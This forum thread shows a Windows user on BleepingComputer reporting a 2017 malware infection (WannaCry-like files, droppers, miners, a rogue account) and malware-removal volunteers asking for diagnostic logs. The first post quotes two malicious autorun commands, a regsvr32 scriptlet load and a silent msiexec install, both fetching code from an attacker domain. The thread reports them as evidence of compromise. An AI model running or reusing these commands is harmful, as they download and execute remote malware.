Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

A massive virus attack including the notorious WannaCry virus


  • Please log in to reply
6 replies to this topic

#1 My-Dear-Friend

My-Dear-Friend

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:02:52 AM

Posted 27 July 2017 - 02:20 AM

I do not know if this is the right place to post.
Yesterday my computer (Windows 7 HB x64 SP1) was subject to a massive virus attack.
The attack was contained by mostly the COMODO HIPS and probably by some of my countermeasures, but I still need to figure out how the viruses got into my computer and if everything of the malware has been removed.

In chronological order:

- At 17:56:40 a file "mssecsvc.exe" was created in the folder "C:\Windows".
  Upon COMODO HIPS alert I terminated and deleted the file.
  VirusTotal scan revealed that the file is Trojan / WanaCry / WannaCryptor RansomWare
  After this the same file kept appearing in the same folder many times during several hours.
  Each time I deleted the file and then after some minutes it reappeared.

- At 18:44:11 a file "c.bat" was created in the folder "C:\Windows\debug"
  The same, upon HIPS alert I deleted the file.
  VirusTotal did not find the file malignant at all, but Malwr scan revealed a lot of malicious activity.

- At 19:22:03 a file "ajtce.exe" was created in the folder "C:\Windows\Temp"
- At 19:22:35 a file "ocioq.exe" was created in the folder "C:\Windows\Temp"
   Both of these files were identified as Trojan Droppers.

By this time I had scanned my computer with Malwarebytes and BitDefender Adware Removal Tool, but they did not find any problems.

Next I had found two new Auto Run entries:

    1) Name: start
    Command line: regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
    Location: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    Process Path: regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll

    2) Name: start1
    Command line: msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
    Product name: Windows Installer - Юникод
    Location: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    Process Path: C:\Windows\system32\msiexec.exe

- At 20:48:10 a file "Fwasf.exe" was created in the folder "C:\"
- At 21:53:24 a file "huazhongdiguo.exe" was created in the folder "C:\"
   Both of these files were identified as Trojan Downloaders.

I deleted both Auto Run entries, downloaded the latest version of the RogueKiller. The scan did not find any substantial problems.

I rebooted the computer and did the Smart Scan with COMODO Cleaning Essentials - again no problems were found.

The file "mssecsvc.exe" kept reappearing in the folder "C:\Windows". Its actions were blocked by COMODO HIPS, but I kept deleting it every time I found it.
Other than that the computer worked normally.

By this time I have found a very suspicious activity of the SYSTEM process, namely it was trying to connect to other user's home computers in my ISP's network, among other places. The TCP connections were made from the ports 445 or 139 - characteristic of the WannaCry virus.

So it looked like some virus had hijacked my computer's SYSTEM process. Over a few hours SYSTEM had downloaded to my computer about 108 MB of some data and uploaded to somewhere in the Internet about 4.5 MB.

I blocked SYSTEM form connecting to the Internet with COMODO Firewall.

Since then no new viruses had appeared on my computer, so far, at least that I know of - there were no alerts.

I have been performing the complete scan with COMODO Cleaning Essentials but it is taking too long, so I will put it on pause. So far it is at 50% and has found no problems at all.

How can I find out how all these viruses got into my computer and if I had removed all of the malware?
 



BC AdBot (Login to Remove)

 


#2 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 72,760 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:NJ USA
  • Local time:07:52 PM

Posted 27 July 2017 - 11:08 AM

Hi could you repost this info with an FRST log from GUIDE in a new topic... Start at step 6.

Please follow this Preparation Guide and post in a new topic.
Let me know if all went well..
How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook

#3 My-Dear-Friend

My-Dear-Friend
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:02:52 AM

Posted 29 July 2017 - 01:48 AM

Hi, boopme. Thanks for the help. The tool that you recommended did a good job, helped me find some more viruses. I do not feel comfortable posting the logs, cos that would violate my privacy and could possibly make me more vulnerable for future attacks.

Though I do appreciate any other help and suggestions.

I am still trying to figure it out. Now I came to conclusion that my computer is infected and it looks like SYSTEM and svchost are hijacked. But no antivirus program that I have used so far is able to detect the main virus.

The summary of the attack so far:

‎2017.04.28  ‏‎23:33:58    C:\qqss77889900.exe                                                   Trojan.Downloader
‎‎2017.04.28  ‏‎23:33:58    *\Temporary Internet Files\Content.IE5\a[1].exe            Trojan.Downloader
2017.04.30  ‏‎0:20:25      C:\1.exe                                                                         Trojan.BitCoinMiner
2017.04.30  ‏‎0:20:25      *\Temporary Internet Files\Content.IE5\1[1].exe             Trojan.BitCoinMiner
2017.05.04  ‏‎0:03:40      C:\1.exe                                                                         Trojan.BitCoinMiner.Generic
‎‎2017.05.04  ‏‎0:03:40      *\Temporary Internet Files\Content.IE5\1[2].exe             Trojan.BitCoinMiner.Generic
2017.07.26  7:47           fake BSOD
2017.07.26  9:44           fake BSOD
2017.07.26  17:56:40    C:\Windows\mssecsvc.exe                                              Ransom.WannaCrypt
‎2017.07.26  ‏‎18:44:10    *\Temporary Internet Files\Content.IE5\ok[1].txt
2017.07.26  18:44:11    C:\Windows\debug\c.bat
2017.07.26  ‏‎18:44:11    C:\Windows\System32\1.txt
2017.07.26  ‏‎18:44:14    C:\Windows\System32\Tasks\Mysa
2017.07.26  19:22:03    C:\Windows\Temp\ajtce.exe                                                 Trojan.Dropper
2017.07.26  ‏‎19:22:03    *\Temporary Internet Files\Content.IE5\fuсkex[1].exe        Trojan.Dropper
2017.07.26  19:22:35    C:\Windows\Temp\ocioq.exe                                                Trojan.Dropper
2017.07.26  ‏‎19:22:35    *\Temporary Internet Files\Content.IE5\fuсkex[2].exe        Trojan.Dropper
2017.07.26  20:48:10    C:\Fwasf.exe
2017.07.26  ‏‎20:48:10    *\Temporary Internet Files\Content.IE5\445[1].exe
2017.07.26  ‏‎20:48:49    *\Temporary Internet Files\Content.IE5\445[2].exe
2017-07-26  21:53:23    A new Windows user's account created "Huweishen-MySql"
2017.07.26  21:53:24    C:\huazhongdiguo.exe                                                        Trojan.Downloader
2017.07.26  ‏‎22:55:07    C:\Windows\System32\s
2017.07.26  ? - 23:16    C:\Windows\mssecsvc.exe                                                  Ransom.WannaCrypt

 

2017.07.27  1:05        I blocked SYSTEM with the COMODO Firewall and the attack stopped.
---------------------------------------------------------
*C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

 

In addition I have found a WMI Script embedded in the WMI database: fuсkyoumm2_consumer, and the two auto run entries. I have no idea when they got installed. All of the viruses mentioned above are now deactivated, except for the main virus, which I was not able to find yet.


Edited by My-Dear-Friend, 29 July 2017 - 06:28 AM.


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:52 PM

Posted 29 July 2017 - 01:14 PM

Hi My-Dear-Friend :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

In order to properly assist you with the clean-up, you'll need to run the tools and provide the logs asked. If you do not feel comfortable providing them publicly, you are always free to PM me them. You can start by following the instructions in the Preparation Guide boopme linked, and provide me the FRST.txt and Addition.txt logs from FRST.

Edited by Aura, 29 July 2017 - 01:14 PM.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 My-Dear-Friend

My-Dear-Friend
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:02:52 AM

Posted 30 July 2017 - 02:36 AM

Hi, Yoan. Thank you for your help. I do appreciate it. Unfortunately, it does not seem to work for me, because I feel uncomfortable uploading the logs that could both violate my privacy and make me vulnerable for future attacks. And since you are telling that you are closing this thread, that does not seem to leave me any options but to look for the help elsewhere.

But you guys a great and are doing a very important work here. It just unfortunately does not seem to work for me.



#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:52 PM

Posted 30 July 2017 - 09:27 AM

Unfortunately, it does not seem to work for me, because I feel uncomfortable uploading the logs that could both violate my privacy and make me vulnerable for future attacks.


These logs won't make you vulnerable to any attack. Also, you are free to share these logs privately with me, meaning that I'll be the only one being able to access them.
 
 
 

And since you are telling that you are closing this thread


Where did I say that?

that does not seem to leave me any options but to look for the help elsewhere.




Just know that every malware removal forums works with the same tools and logs I'm asking you to use here. So if it doesn't work for you here, it probably won't work for you on any other forums doing the same kind of malware removal assistance as we do here.

Edited by Aura, 30 July 2017 - 09:28 AM.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 My-Dear-Friend

My-Dear-Friend
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:02:52 AM

Posted 30 July 2017 - 04:03 PM

Hi, Yoan. Thanks again for your help.

I found some more revealing information about the attack, so I could keep updating this thread with my progress as I keep looking for the virus.

And if you have time and desire, maybe you could provide me with some hints from time to time as to what I could check and where I could look.

And if you do not want, then I surely can not demand that you spend your time helping me, I would not blame you if you won't.

Or you will close this thread if I do not provide you with the logs? And you probably will not allow anybody else to help me?

I am just wondering if I misread your message, cos I am constantly coming across people who make some rules and then they hurt others for not obeying their rules.

I do not mean you, I mean some other people.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users